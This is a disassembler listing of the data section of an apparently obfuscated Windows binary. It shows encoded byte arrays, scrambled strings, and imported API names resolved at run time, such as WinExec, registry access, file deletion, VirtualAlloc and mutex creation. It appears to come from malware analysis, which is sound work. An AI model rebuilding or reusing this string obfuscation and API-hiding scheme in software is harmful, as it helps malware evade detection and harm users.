dword_44C878 dd 40650002h ; DATA XREF: sub_442AF2:loc_442B30�o
db 6, 0
word_44C87E dw 1 ; DATA XREF: sub_442511+306�o
db 4Ch, 6Fh, 0
byte_44C883 db 1 ; DATA XREF: sub_442511+2B4�o
dd 0F3D000h
dword_44C888 dd 0D9FA0001h ; DATA XREF: sub_442511+236�o
db 0
byte_44C88D db 7, 0, 0E1h ; DATA XREF: sub_442511+212�o
aIxxs db '',0
dword_44C898 dd 9FBC0001h ; DATA XREF: sub_442511+1D0�o
db 0
byte_44C89D db 7, 0, 43h ; DATA XREF: sub_442511:loc_442632�o
a773yll db '+773yll',0
dword_44C8A8 dd 0F596042Bh, 0FEF5F3FEh, 0E4E6F8F3h, 0B8E5E5F3h, 0F9F0F8FFh
; DATA XREF: sub_442511+10�o
dd 0FAF9F1B5h, 0FAF9E6F2h, 0F9F5B8FAh, 0F8FFB5FBh, 0FAF9F1E2h
dd 0F9F5B8F2h, 0E1E1B5FBh, 0F4F5B8E1h, 0E3E4B8E4h, 0E1E1E1B5h
dd 0F5F9E5B8h, 0F7B8E5FDh, 0E2E5B5F5h, 0E6FBE4F9h, 0F5B8EFF7h
dd 0F5B5FBF9h, 0F9E2E3E4h, 0E3F8B8E6h, 0E1F3F8B5h, 0F1F1F3B8h
dd 0FBF9F5B8h, 0E1E1E1B5h, 0F8F9E6B8h, 0F5E5FFECh, 0B8E5FBF7h
dd 0B5FBF9F5h, 0F5FAF3E1h, 0A5F3FBF9h, 0FFFBE5B8h, 0F5B8F3FAh
dd 0FDE3B8F9h, 0F4FAF9B5h, 0F7F8B8A4h, 0F8F9FFE2h, 0F5B8E2F3h
dd 0E1B5FBF9h, 0F4B8E1E1h, 0B8F8FFF4h, 0FBB5E3E4h, 0F3E2E5F7h
dd 0B8EEBBE4h, 0B5FBF9F5h, 0B8E1E1E1h, 0ECF8F9E6h, 0F7F5E5FFh
dd 0F5B8E5FBh, 0E1B5FBF9h, 0F4B8E1E1h, 0BBFDF8F7h, 0E7F8F7F4h
dd 0F5BBF3E3h, 0F2F7F8F7h, 0F7F5B8F7h, 0E1E1E1B5h, 0F8F9E6B8h
dd 0F5E5FFECh, 0B8E5FBF7h, 0B5FBF9F5h, 0B8E1E1E1h, 0B8F9FBF4h
dd 0B5FBF9F5h, 0E6EFF7E6h, 0F5B8FAF7h, 0F3B5FBF9h, 0B8EFF7F4h
dd 0B5FBF9F5h, 0B8E1E1E1h, 0FDF8F7F4h, 0F7FBF0F9h, 0F7E4E3F2h
dd 0FBF9F5B8h, 0E1E1E1B5h, 0F4FFF5B8h, 0F9F5B8F5h, 0E1E1B5FBh
dd 0E2E0B8E1h, 0E3E4B8F4h, 0E1E1E1B5h, 0F4E1F5B8h, 0B8FDF8F7h
dd 0B5FBF9F5h, 0F2FAF9F1h, 0FAFAF9E6h, 0FBF9F5B8h, 0E1E1E1B5h
dd 0F8F9E6B8h, 0F5E5FFECh, 0B8E5FBF7h, 0B5FBF9F5h, 0B8E1E1E1h
dd 0F7F4FBFBh, 0E4B8FDF8h, 0E1E1B5E3h, 0F8E3B8E1h, 0E2E5F7FFh
dd 0B8FBE3E4h, 0F1B5E3E4h, 0E6F2FAF9h, 0B8FAFAF9h, 0B5FBF9F5h
dd 0B8E1E1E1h, 0ECF8F9E6h, 0F7F5E5FFh, 0F5B8E5FBh, 0E1B5FBF9h
dd 0E1B8E1E1h, 0F2FAE4F9h, 0FDF8F7F4h, 0F1E4F9B8h, 0E1E1E1B5h
dd 0F8F7F5B8h, 0F7F2FFF2h, 0F3E0F3E2h, 0FFF0FFE4h, 0F5B8E4F3h
dd 0E1B5FBF9h, 0E6B8E1E1h, 0FFECF8F9h, 0FBF7F5E5h, 0F9F5B8E5h
dd 0E1E1B5FBh, 0F7F4B8E1h, 0F0F9FDF8h, 0FFF2F8FFh, 0F9F5B8F7h
dd 0E1E1B5FBh, 0F5FFB8E1h, 0FDF8F7F4h, 0B5E3E4B8h, 0FDF8F7F4h
dd 0B8F1F8FFh, 0FFFAF7FEh, 0BBEEF7F0h, 0FFFAF8F9h, 0F5B8F3F8h
dd 0FDE3B8F9h, 0E1E1E1B5h, 0F8F3E0B8h, 0E5E4F9F2h, 0F3FBF7F8h
dd 0B5E5E1B8h, 0B8E1E1E1h, 0B8F4FBFDh, 0E1B5E3E4h, 0F8B8E1E1h
dd 0F7FBE2F3h, 0E2E5FFF1h, 0F5B8E4F3h, 0FDB5FBF9h, 0F7FDE0F7h
dd 0F8F3F5ECh, 0B8E4F3E2h, 0B5FBF9F5h, 0B8E1E1E1h, 0F2F8F3E0h
dd 0F8E5E4F9h, 0B8F3FBF7h, 0FBB5E5E1h, 0FAF8F9EFh, 0F7F3F8FFh
dd 0E3F9F5F5h, 0A4E5E2F8h, 0F4F4F7B8h, 0F7F8EFF3h, 0F8F9FFE2h
dd 0F5B8FAF7h, 0FDE3B8F9h, 0FAF8F9B5h, 0BBF3F8FFh, 0FFE5E3F4h
dd 0E5E5F3F8h, 0F9FAFAB8h, 0E2E5F2EFh, 0F5B8F4E5h, 0FDE3B8F9h
dd 0E1E1E1B5h, 0FAFAF7B8h, 0F4F7FEF7h, 0F7F4F2F7h, 0F5B8FDF8h
dd 0E1B5FBF9h, 0E4B8E1E1h, 0F5B8F5F4h, 0E1B5FBF9h, 0E6B8E1E1h
dd 0FFECF8F9h, 0FBF7F5E5h, 0F9F5B8E5h, 0E1E1B5FBh, 0FEB8A7E1h
dd 0B8F5F4E5h, 0FDB5F7F5h, 0F3E4F4F1h, 0F5EEF7FAh, 0B8F4E3FAh
dd 0EFB5E3E4h, 0F9F4FBF7h, 0ECFFF4B8h, 0F2FFFDB5h, 0F4BBE5F9h
dd 0B8FDF8F7h, 0E1B5E3E4h, 0FAB8E1E1h, 0FFF2F5F4h, 0E2F5F3E4h
dd 0E3F7FAB8h, 0E2F8F3E4h, 0F4F8F7FFh, 0B8FDF8F7h, 0F4B5F7F5h
dd 0FAF5E4F7h, 0B8E5EFF7h, 0B5FBF9F5h, 0F7E2F9E2h, 0F0EFFAFAh
dd 0F4F3F3E4h, 0FFFDF8F7h, 0F5B8F1F8h, 0E1B5FBF9h, 0F8B8E1E1h
dd 0F5B8F5F4h, 0A5A3B5F7h, 0FDF8F7F4h, 0FBF9F5B8h, 0E1E1E1B5h
dd 0F8F3E0B8h, 0E5E4F9F2h, 0F3FBF7F8h, 0B5E5E1B8h, 0B8E1E1E1h
dd 0BBF4A4F4h, 0E5E3E4E2h, 0F9F5B8E2h, 0E1E1B5FBh, 0F3E0B8E1h
dd 0E4F9F2F8h, 0FBF7F8E5h, 0E5E1B8F3h, 0F3E6F9B5h, 0F8F7F4F8h
dd 0F9F5B8FDh, 0F7E2B5FBh, 0F3F8BBE2h, 0F7F4E2F0h, 0E4B8FDF8h
dd 0F3E5B5E3h, 0F4F7FAF5h, 0B5E3E4B8h, 0E3F5F3E5h, 0EFE2FFE4h
dd 0B8F4F7FAh, 0F0B5E3E4h, 0F7FEE2F3h, 0F4B8F2E4h, 0F1B5ECFFh
dd 0EEF8F9E4h, 0F8F7FAE6h, 0B8E5E2F3h, 0E0B5E3E4h, 0F9F2F8F3h
dd 0F7F8E5E4h, 0E1B8F3FBh, 0B5E5h
dword_44CCD8 dd 4, 0F000B2h, 0F600FDh, 0EBh ; DATA XREF: sub_44206A+27�o
dword_44CCE8 dd 3E1E0001h ; DATA XREF: sub_4419F6:loc_441EDE�o
db 0
byte_44CCED db 2 dup(0), 15h ; DATA XREF: sub_4419F6+49F�o
db 0
byte_44CCF1 db 13h, 0, 47h ; DATA XREF: sub_4419F6+47A�o
db 12h
aG3G235__0 db ')&%+"g3(g&23/(5.="',0
a5_0 db '5',0 ; DATA XREF: sub_4419F6+46A�o
dw 0A2F7h
aScxitGsCvgqseu db '׃זקקה',0
byte_44CD41 db 1, 0, 0A3h ; DATA XREF: sub_4419F6:loc_441CAD�o
db 8Eh, 0
word_44CD46 dw 1Eh ; DATA XREF: sub_4419F6+272�o
db 0Ch
db 5Ch, 60h, 69h
db 6Dh ; m
db 7Fh, 69h, 20h
db 2Ch ; ,
db 7Fh, 69h, 60h
aIoxItEMxecbU_0 db 'iox,It|e~mxecb,Uim~',0
dword_44CD68 dd 10300001h ; DATA XREF: sub_4419F6:loc_441BF9�o
db 0
byte_44CD6D db 1Fh, 0, 9Ah ; DATA XREF: sub_4419F6+1BE�o
dd 0FBFFF6CAh, 0BAB6FFE9h, 0FFF6FFE9h, 0DFBAEEF9h, 0E8F3EAE2h
dd 0F5F3EEFBh, 0F5D7BAF4h, 0F2EEF4h
dword_44CD90 dd 77520004h, 0A6A62h ; DATA XREF: sub_44185A+69�o
dword_44CD98 dd 5C100000h ; DATA XREF: sub_4415E2+2D�o
db 0
byte_44CD9D db 1, 0, 0F8h ; DATA XREF: sub_4413B6+1B0�o
db 0D2h, 0
word_44CDA2 dw 4 ; DATA XREF: sub_4413B6+95�o
db ')-)))',0
asc_44CDAA db 9,0 ; DATA XREF: sub_441189+16B�o
dd 0F123060h, 14031504h
db 29h, 4, 0
byte_44CDB7 db 29h ; DATA XREF: sub_441189+15B�o
dd 9C80D300h, 92848795h, 9E8F9681h, 0BCA1B0BAh, 0A7B5BCA0h
dd 0BDBA848Fh, 0A0A4BCB7h, 0A1A6908Fh, 0A7BDB6A1h, 0A0A1B685h
dd 0BDBCBAh
dword_44CDE4 dd 755B0001h ; DATA XREF: sub_441189+13F�o
db 0
byte_44CDE9 db 4, 0, 65h ; DATA XREF: sub_441189+DA�o
aH@K db 'H@=K',0
byte_44CDF1 db 3, 0, 8Bh ; DATA XREF: sub_441189+9C�o
dd 0D7B1E8h
dword_44CDF8 dd 0ECC90008h, 0BCECE7BCh, 0BCECE7h ; DATA XREF: sub_441189:loc_4411ED�o
dword_44CE04 dd 612F0002h ; DATA XREF: sub_441189+4F�o
db 7Bh, 0
word_44CE0A dw 2 ; DATA XREF: sub_441189+31�o
dd 86E7DEh
dword_44CE10 dd 73150000h, 70637274h ; DATA XREF: sub_440F62+19F�o
db 79h, 0
word_44CE1A dw 0 ; DATA XREF: sub_440F62+183�o
aVsprintf db 'vsprintf',0
word_44CE26 dw 0 ; DATA XREF: sub_440F62+167�o
aZsprintf db 'sprintf',0
byte_44CE31 db 2 dup(0), 0B6h ; DATA XREF: sub_440F62+14B�o
aStrcat db 'strcat',0
byte_44CE3B db 0 ; DATA XREF: sub_440F62+12F�o
dd 72731B00h, 646E61h
dword_44CE44 dd 72C00000h, 646E61h ; DATA XREF: sub_440F62+113�o
dword_44CE4C dd 6D100000h, 65736D65h ; DATA XREF: sub_440F62+F7�o
db 74h, 0
word_44CE56 dw 0 ; DATA XREF: sub_440F62+DB�o
a4memcpy db '4memcpy',0
dword_44CE60 dd 6D930000h, 6D636D65h ; DATA XREF: sub_440F62+BF�o
db 70h, 0
word_44CE6A dw 0 ; DATA XREF: sub_440F62+A3�o
aTmalloc db 'tmalloc',0
dword_44CE74 dd 66CD0000h, 656572h ; DATA XREF: sub_440F62+87�o
dword_44CE7C dd 61C20000h, 696F74h ; DATA XREF: sub_440F62+6B�o
dword_44CE84 dd 74E50000h, 7070756Fh ; DATA XREF: sub_440F62+4F�o
db 65h, 72h, 0
byte_44CE8F db 0 ; DATA XREF: sub_440F62:loc_440F95�o
dd 735F1400h, 7065656Ch
db 0
byte_44CE99 db 2 dup(0), 0Eh ; DATA XREF: sub_440F62+1C�o
aCrtdll_dll db 'crtdll.dll',0
byte_44CEA7 db 0 ; DATA XREF: sub_440F62+1�o
dd 7263E200h, 6C6C6474h, 6C6C642Eh
db 0
byte_44CEB5 db 2 dup(0), 20h ; DATA XREF: sub_440C0A+1EB�o
aKkqVx_0 db 'kkq-vx',0
byte_44CEBF db 0 ; DATA XREF: sub_440C0A+1DB�o
dd 6B6B6D00h, 78762D71h
db 0
byte_44CEC9 db 2 dup(0), 0C3h ; DATA XREF: sub_440C0A+15D�o
aKkqVx_1 db 'kkq-vx',0
byte_44CED3 db 0 ; DATA XREF: sub_440C0A+F3�o
dd 6B6B1C00h, 78762D71h
db 0
byte_44CEDD db 2 dup(0), 7 ; DATA XREF: sub_440C0A+E3�o
aS_mtxU db '%s_mtx%u',0
byte_44CEE9 db 2 dup(0), 0D0h ; DATA XREF: sub_440C0A+B1�o
aKkqVx_2 db 'kkq-vx',0
byte_44CEF3 db 0 ; DATA XREF: sub_440C0A+A1�o
dd 7325CC00h, 78746D5Fh
db 31h, 0
word_44CEFE dw 16h ; DATA XREF: sub_43FB8B+DF2�o
aTbolbiNmbzNB_0 db '⡎¶¡',0
dword_44CF18 dd 7A380006h, 776C6C6Dh ; DATA XREF: sub_43FB8B+DE2�o
db 76h, 0
word_44CF22 dw 1Eh ; DATA XREF: sub_43FB8B+D44�o
dd 545C4104h, 5045564Dh, 244A4B4Dh, 41504540h, 450E0E0Eh
dd 54244950h, 47244A4Dh, 41404Bh
dword_44CF44 dd 580B0006h, 425F4A5Fh ; DATA XREF: sub_43FB8B+D34�o
db 48h, 0
word_44CF4E dw 0 ; DATA XREF: sub_43FB8B+C74�o
db 0B8h, 0
word_44CF52 dw 4 ; DATA XREF: sub_43FB8B+C64�o
aIcl_0 db 'ߚ',0
word_44CF5A dw 6 ; DATA XREF: sub_43FB8B+BDF�o
dd 0E0F5F7C5h, 0B0F7EBh
dword_44CF64 dd 0A0850004h, 0F0B7ABh ; DATA XREF: sub_43FB8B:loc_440710�o
dword_44CF6C dd 0B40000h ; DATA XREF: sub_43FB8B+ABC�o
dword_44CF70 dd 16550008h, 1A17181Ah, 0D1A17h ; DATA XREF: sub_43FB8B+AAC�o
dword_44CF7C dd 8E0000h ; DATA XREF: sub_43FB8B+9FA�o
dword_44CF80 dd 5A190008h, 565B5456h, 41565Bh ; DATA XREF: sub_43FB8B+9EA�o
dword_44CF8C dd 41120006h, 5B465346h ; DATA XREF: sub_43FB8B+8DD�o
db 51h, 0
word_44CF96 dw 6Eh ; DATA XREF: sub_43FB8B:loc_440442�o
db 43h ; C
db 16h, 2Dh, 22h
db 21h ; !
db 2Fh, 26h, 63h
db 37h ; 7
db 2Ch, 63h, 22h
db 36h ; 6
db 37h, 2Bh, 2Ch
db 31h ; 1
db 2Ah, 39h, 26h
db 6Dh ; m
db 49h, 66h, 30h
db 63h ; c
db 33h, 31h, 2Ch
db 20h
db 26h, 2 dup(30h)
db 2Ah ; *
db 2Dh, 24h, 63h
db 20h
db 26h, 2Dh, 37h
db 26h ; &
db 31h, 63h, 2Ah
db 30h ; 0
db 63h, 36h, 2Dh
db 22h ; "
db 21h, 2Fh, 26h
db 63h ; c
db 37h, 2Ch, 63h
db 22h ; "
db 36h, 37h, 2Bh
db 2Ch ; ,
db 31h, 2Ah, 39h
db 26h ; &
db 63h, 3Ah, 2Ch
db 36h ; 6
db 31h, 63h, 20h
db 22h ; "
db 31h, 27h, 63h
db 66h ; f
db 30h, 6Dh, 49h
db 0Eh
aC1170cC71CM_0 db '"(&c ,11& 7*,-0c"-',27h,'c71:c"$"*-m',0
aM_0: ; DATA XREF: sub_43FB8B:loc_44042A�o
dw 0Ah
unicode 0, <M>
dd 28393E2Ch, 3F2C0E3Fh
db 29h, 0
word_44D016 dw 4 ; DATA XREF: sub_43FB8B+885�o
dd 0E140B5Dh
db 1Ch, 0
word_44D01E dw 1 ; DATA XREF: sub_43FB8B+7C2�o
db 42h, 62h, 0
byte_44D023 db 6 ; DATA XREF: sub_43FB8B+7B2�o
dd 2D2A7900h, 3A302D38h
db 0
byte_44D02D db 2 dup(0), 92h ; DATA XREF: sub_43FB8B+690�o
db 0
byte_44D031 db 6, 0, 76h ; DATA XREF: sub_43FB8B+680�o
a7?5 db '%"7"?5',0
byte_44D03B db 15h ; DATA XREF: sub_43FB8B+5F8�o
db 0
aFlfff6455F_0 db 'flFFF64)%#55/(!F ',27h,'/*#"',0
dword_44D054 dd 0D5E0006h, 170A1F0Ah ; DATA XREF: sub_43FB8B+5E8�o
db 1Dh, 0
word_44D05E dw 6 ; DATA XREF: sub_43FB8B+4D9�o
aB3o4_0 db 'B))3o4:',0
asc_44D068 db 8,0 ; DATA XREF: sub_43FB8B+46E�o
aIAgI_0 db '̉',0
asc_44D074 db 9,0 ; DATA XREF: sub_43FB8B:loc_43FFDD�o
dw 0C480h
dd 0E2CFE3EFh, 0F4E3E5EAh
db 0
byte_44D081 db 0Eh, 0, 0D4h ; DATA XREF: sub_43FB8B+426�o
aAGGcZz_0 db '',0
byte_44D093 db 4 ; DATA XREF: sub_43F8DE+56�o
dd 0F4B49A00h
db 0F6h, 0E9h, 0
byte_44D09B db 1 ; DATA XREF: sub_43F8DE+2A�o
dd 0FBA700h
dword_44D0A0 dd 25030000h, 5C732573h ; DATA XREF: sub_43F357+31C�o
db 0
byte_44D0A9 db 5, 0, 2Bh ; DATA XREF: sub_43F357+2AB�o
dd 580E580Eh
db 77h, 0
word_44D0B2 dw 0 ; DATA XREF: sub_43F357+C1�o
aUS db '%s*',0
byte_44D0B9 db 4, 0, 8Fh ; DATA XREF: sub_43F357+73�o
aK_0 db '',0
align 4
asc_44D0C4: ; DATA XREF: sub_43F058+1D2�o
dw 9
unicode 0, <>,0
aZagkAalb:
unicode 0, <ŧ>,0
a_ db '_',0 ; DATA XREF: sub_43F058+12A�o
aIu_iTyi_TyiT_0 db 'Iu $.i> -=!tyi!, .!=tyi+&;-,;tyi:;*t!==9sffl:v!tl:o tl<l:o&tl<o/t'
db 'l*o: tl:o:&tl<o=%tl<o?tl<o-tl:w',0
asc_44D141 db ',',0 ; DATA XREF: sub_43F058+D5�o
aBAAnaAnaAnaA_0 db 'ڝՀɀπހΒۀރ',0
asc_44D171 db 7,0 ; DATA XREF: sub_43F058+67�o
aNPnuP_0 db 'ӏӏ',0
dword_44D17C dd 417A0003h ; DATA XREF: sub_43E5EA+2F6�o
db 15h, 47h, 0
byte_44D183 db 4 ; DATA XREF: sub_43E5EA:loc_43E852�o
dd 337B4000h
db 2Fh, 7Dh, 0
byte_44D18B db 4 ; DATA XREF: sub_43E5EA+22D�o
dd 0ACF3C800h, 0E2F5h
dword_44D194 dd 3, 0F0046h, 1000Bh ; DATA XREF: sub_43E5EA+16�o
db 2 dup(0)
word_44D1A2 dw 0 ; DATA XREF: sub_43E26E:loc_43E2A1�o
aShgetfolderpat db 'SHGetFolderPathA',0
word_44D1B6 dw 0 ; DATA XREF: sub_43E26E+1C�o
aMshell32_dll db 'shell32.dll',0
byte_44D1C5 db 2 dup(0), 0Eh ; DATA XREF: sub_43E26E+1�o
aShell32_dll db 'shell32.dll',0
dword_44D1D4 dd 47020000h, 73557465h, 614E7265h, 41656Dh ; DATA XREF: sub_43E1C6+87�o
dword_44D1E4 dd 520B0000h, 6C436765h, 4B65736Fh ; DATA XREF: sub_43E1C6+6B�o
db 65h, 79h, 0
byte_44D1F3 db 0 ; DATA XREF: sub_43E1C6+4F�o
dd 6552EF00h, 65755167h, 61567972h, 4565756Ch
db 78h, 41h, 0
byte_44D207 db 0 ; DATA XREF: sub_43E1C6:loc_43E1F9�o
dd 65529B00h, 65704F67h, 79654B6Eh, 417845h
dword_44D218 dd 6607000Ch, 77667163h, 2935346Eh, 6B6B63h ; DATA XREF: sub_43E1C6+1C�o
dword_44D228 dd 618E0000h, 70617664h, 2E323369h, 6C6C64h ; DATA XREF: sub_43E1C6+1�o
dword_44D238 dd 5C970000h ; DATA XREF: sub_43DD90:loc_43E02D�o
db 0
byte_44D23D db 5, 0, 6Fh ; DATA XREF: sub_43DA75+2C8�o
dd 4A331C4Ah
db 1Ch, 0
word_44D246 dw 5 ; DATA XREF: sub_43DA75+25A�o
dd 230C5A7Fh
db 5Ah, 0Ch, 0
byte_44D24F db 4 ; DATA XREF: sub_43DA75+17�o
dd 0F8AE8B00h
db 0D7h, 0A1h, 0
byte_44D257 db 4 ; DATA XREF: sub_43D982+55�o
dd 98D8F600h
db 9Ah, 85h, 0
byte_44D25F db 1 ; DATA XREF: sub_43D982+29�o
dd 792500h
dword_44D264 dd 450C0011h, 7E697862h, 2C786962h, 607C7449h, 7E697E63h
; DATA XREF: sub_43D912+24�o
db 0
off_44D279 dd offset loc_43FFFE+2 ; DATA XREF: sub_43D622:loc_43D8A9�o
byte_44D27D db 1, 0, 55h ; DATA XREF: sub_43D622:loc_43D831�o
db 2Dh, 0
word_44D282 dw 0 ; DATA XREF: sub_43D523:loc_43D57F�o
db 0E4h, 0
word_44D286 dw 0 ; DATA XREF: sub_43D4B3+4F�o
aGetstockobject db 'GetStockObject',0
dword_44D298 dd 43B00000h, 74616572h, 6E6F4665h ; DATA XREF: sub_43D4B3:loc_43D4E6�o
db 74h, 41h, 0
byte_44D2A7 db 9 ; DATA XREF: sub_43D4B3+1C�o
dd 292A4D00h, 637F7E24h, 212129h
dword_44D2B4 dd 67D70000h, 32336964h, 6C6C642Eh ; DATA XREF: sub_43D4B3+1�o
db 0
byte_44D2C1 db 2 dup(0), 0BFh ; DATA XREF: sub_43D3CC+A3�o
aIsequalguid db 'IsEqualGUID',0
dword_44D2D0 dd 436F0000h, 696E556Fh, 6974696Eh, 7A696C61h ; DATA XREF: sub_43D3CC+87�o
db 65h, 0
word_44D2E2 dw 0 ; DATA XREF: sub_43D3CC+6B�o
aCoinitialize db 'CoInitialize',0
word_44D2F2 dw 0 ; DATA XREF: sub_43D3CC+4F�o
dd 436F43F7h, 74616572h, 736E4965h, 636E6174h
db 65h, 0
word_44D306 dw 0 ; DATA XREF: sub_43D3CC:loc_43D3FF�o
aClsidfromstrin db 'CLSIDFromString',0
byte_44D319 db 2 dup(0), 61h ; DATA XREF: sub_43D3CC+1C�o
aOle32_dll db 'ole32.dll',0
word_44D326 dw 0 ; DATA XREF: sub_43D3CC+1�o
aOle32_dll_0 db 'ole32.dll',0
byte_44D333 db 4 ; DATA XREF: sub_43CF47+3D6�o
dd 0C08AA400h
db 0C5h, 0D0h, 0
byte_44D33B db 17h ; DATA XREF: sub_43CBE3:loc_43CDD7�o
dd 4C0A2F00h, 4C0A4C0Ah, 0A024C0Ah, 2 dup(0A4C0A4Ch), 404C014Ch
db 42h, 0
word_44D356 dw 16h ; DATA XREF: sub_43CBE3+1AE�o
dd 12541237h, 12541254h, 1A541254h, 2 dup(54125412h), 424519h
dword_44D370 dd 474C0000h, 6F4C7465h, 656C6163h, 6F666E49h ; DATA XREF: sub_43C105+499�o
db 41h, 0
word_44D382 dw 0 ; DATA XREF: sub_43C105+47D�o
aNgetversionexa db 'GetVersionExA',0
byte_44D393 db 0 ; DATA XREF: sub_43C105+461�o
dd 6946C500h, 6954656Ch, 6F54656Dh, 74737953h, 69546D65h
db 6Dh, 65h, 0
byte_44D3AB db 0 ; DATA XREF: sub_43C105+445�o
dd 6F43A600h, 7261706Dh, 6C694665h, 6D695465h
db 65h, 0
word_44D3BE dw 0 ; DATA XREF: sub_43C105+429�o
aTgetvolumeinfo db 'tGetVolumeInformationA',0
byte_44D3D7 db 0 ; DATA XREF: sub_43C105+40D�o
dd 6E497B00h, 6C726574h, 656B636Fh, 63654464h, 656D6572h
db 6Eh, 74h, 0
byte_44D3EF db 0 ; DATA XREF: sub_43C105+3F1�o
dd 6E49DF00h, 6C726574h, 656B636Fh, 636E4964h, 656D6572h
db 6Eh, 74h, 0
byte_44D407 db 0 ; DATA XREF: sub_43C105+3D5�o
dd 65477600h, 73795374h, 446D6574h, 63657269h, 79726F74h
db 41h, 0
word_44D41E dw 0 ; DATA XREF: sub_43C105+3B9�o
aAgetmodulefile db 'GetModuleFileNameA',0
dword_44D434 dd 4FE50000h, 4D6E6570h, 78657475h ; DATA XREF: sub_43C105+39D�o
db 41h, 0
word_44D442 dw 0 ; DATA XREF: sub_43C105+381�o
aScreatemutexa db 'CreateMutexA',0
word_44D452 dw 0 ; DATA XREF: sub_43C105+365�o
dd 706F43F7h, 6C694679h
db 65h, 41h, 0
byte_44D45F db 0 ; DATA XREF: sub_43C105+349�o
db 0
a_getdiskfreesp db '_GetDiskFreeSpaceA',0
dword_44D474 dd 53F20000h, 72457465h, 4D726F72h, 65646Fh ; DATA XREF: sub_43C105+32D�o
dword_44D484 dd 47E80000h, 78457465h, 6F437469h, 68546564h, 64616572h
; DATA XREF: sub_43C105+311�o
db 0
byte_44D499 db 2 dup(0), 0CBh ; DATA XREF: sub_43C105+2F5�o
aGetdrivetypea db 'GetDriveTypeA',0
word_44D4AA dw 0 ; DATA XREF: sub_43C105+2D9�o
aZfindclose db 'zFindClose',0
byte_44D4B7 db 0 ; DATA XREF: sub_43C105+2BD�o
dd 69461E00h, 654E646Eh, 69467478h, 41656Ch
dword_44D4C8 dd 46610000h, 46646E69h, 74737269h, 656C6946h ; DATA XREF: sub_43C105+2A1�o
db 41h, 0
word_44D4DA dw 0 ; DATA XREF: sub_43C105+285�o
aMgettickcount db 'GetTickCount',0
word_44D4EA dw 0 ; DATA XREF: sub_43C105+269�o
aZrtlzeromemory db 'RtlZeroMemory',0
byte_44D4FB db 0 ; DATA XREF: sub_43C105+24D�o
dd 65470800h, 73795374h, 546D6574h, 656D69h
dword_44D50C dd 4C8F0000h, 6C61636Fh, 65657246h ; DATA XREF: sub_43C105+231�o
db 0
byte_44D519 db 2 dup(0), 72h ; DATA XREF: sub_43C105+215�o
aLocalalloc db 'LocalAlloc',0
byte_44D527 db 0 ; DATA XREF: sub_43C105+1F9�o
dd 69567600h, 61757472h, 6572466Ch
db 65h, 0
word_44D536 dw 0 ; DATA XREF: sub_43C105+1DD�o
aGvirtualalloc db 'VirtualAlloc',0
word_44D546 dw 0 ; DATA XREF: sub_43C105+1C1�o
a8readfile db '8ReadFile',0
word_44D552 dw 0 ; DATA XREF: sub_43C105+1A5�o
aGettemppatha db 'GetTempPathA',0
word_44D562 dw 0 ; DATA XREF: sub_43C105+189�o
aEglobalmemorys db 'GLobalMemoryStatus',0
dword_44D578 dd 4DE90000h, 69746C75h, 65747942h, 69576F54h, 68436564h
; DATA XREF: sub_43C105+16D�o
db 61h, 72h, 0
byte_44D58F db 0 ; DATA XREF: sub_43C105+151�o
dd 69579000h, 68436564h, 6F547261h, 746C754Dh, 74794269h
db 65h, 0
word_44D5A6 dw 0 ; DATA XREF: sub_43C105+135�o
aTwinexec db 'WinExec',0
byte_44D5B1 db 2 dup(0), 46h ; DATA XREF: sub_43C105+119�o
aLstrlenw db 'lstrlenW',0
byte_44D5BD db 2 dup(0), 4Bh ; DATA XREF: sub_43C105+FD�o
aGetfilesize db 'GetFileSize',0
dword_44D5CC dd 43C80000h, 65736F6Ch, 646E6148h ; DATA XREF: sub_43C105+E1�o
db 6Ch, 65h, 0
byte_44D5DB db 0 ; DATA XREF: sub_43C105+C5�o
dd 72572600h, 46657469h, 656C69h
dword_44D5E8 dd 53C00000h, 69467465h, 6F50656Ch, 65746E69h ; DATA XREF: sub_43C105+A9�o
db 72h, 0
word_44D5FA dw 0 ; DATA XREF: sub_43C105+8D�o
aJdeletefilea db 'DeleteFileA',0
byte_44D609 db 2 dup(0), 0ECh ; DATA XREF: sub_43C105+71�o
aCreatefilea db 'CreateFileA',0
dword_44D618 dd 4CE70000h, 4C64616Fh, 61726269h, 417972h ; DATA XREF: sub_43C105+55�o
dword_44D628 dd 47860000h, 6F4D7465h, 656C7564h, 646E6148h, 41656Ch
; DATA XREF: sub_43C105+39�o
dword_44D63C dd 42BB0000h, 706565h ; DATA XREF: sub_43C105+1D�o
dword_44D644 dd 45980000h, 54746978h, 61657268h ; DATA XREF: sub_43C105+1�o
db 64h, 0
word_44D652 dw 0 ; DATA XREF: sub_43BDDE+2EF�o
db 16h
aEnumdesktopwin db 'EnumDesktopWindows',0
dword_44D668 dd 46E10000h, 57646E69h, 6F646E69h, 41784577h ; DATA XREF: sub_43BDDE+2D3�o
db 0
byte_44D679 db 2 dup(0), 56h ; DATA XREF: sub_43BDDE+2B7�o
aTranslatemessa db 'TranslateMessage',0
byte_44D68D db 2 dup(0), 9Fh ; DATA XREF: sub_43BDDE+29B�o
aShowwindow db 'ShowWindow',0
byte_44D69B db 0 ; DATA XREF: sub_43BDDE+27F�o
dd 65539D00h, 6E695774h, 54776F64h, 41747865h
db 0
byte_44D6AD db 2 dup(0), 62h ; DATA XREF: sub_43BDDE+263�o
aSetwindowlonga db 'SetWindowLongA',0
byte_44D6BF db 0 ; DATA XREF: sub_43BDDE+247�o
dd 6553A000h, 6D695474h
db 65h, 72h, 0
byte_44D6CB db 0 ; DATA XREF: sub_43BDDE+22B�o
dd 65530A00h, 636F4674h
db 75h, 73h, 0
byte_44D6D7 db 0 ; DATA XREF: sub_43BDDE+20F�o
dd 6553B800h, 654D646Eh, 67617373h
db 65h, 41h, 0
byte_44D6E7 db 0 ; DATA XREF: sub_43BDDE+1F3�o
dd 6552E800h, 74736967h, 6C437265h, 41737361h
db 0
byte_44D6F9 db 2 dup(0), 62h ; DATA XREF: sub_43BDDE+1D7�o
aMovewindow db 'MoveWindow',0
byte_44D707 db 0 ; DATA XREF: sub_43BDDE+1BB�o
dd 654D4000h, 67617373h, 786F4265h
db 41h, 0
word_44D716 dw 0 ; DATA XREF: sub_43BDDE+19F�o
aPloadicona db 'PLoadIconA',0
byte_44D723 db 0 ; DATA XREF: sub_43BDDE+183�o
dd 6F4C0100h, 75436461h, 726F7372h
db 41h, 0
word_44D732 dw 0 ; DATA XREF: sub_43BDDE+167�o
aGetwindowtexta db 'GetWindowTextA',0
dword_44D744 dd 47990000h, 69577465h, 776F646Eh, 74636552h ; DATA XREF: sub_43BDDE+14B�o
db 0
byte_44D755 db 2 dup(0), 33h ; DATA XREF: sub_43BDDE+12F�o
aGetwindowlonga db 'GetWindowLongA',0
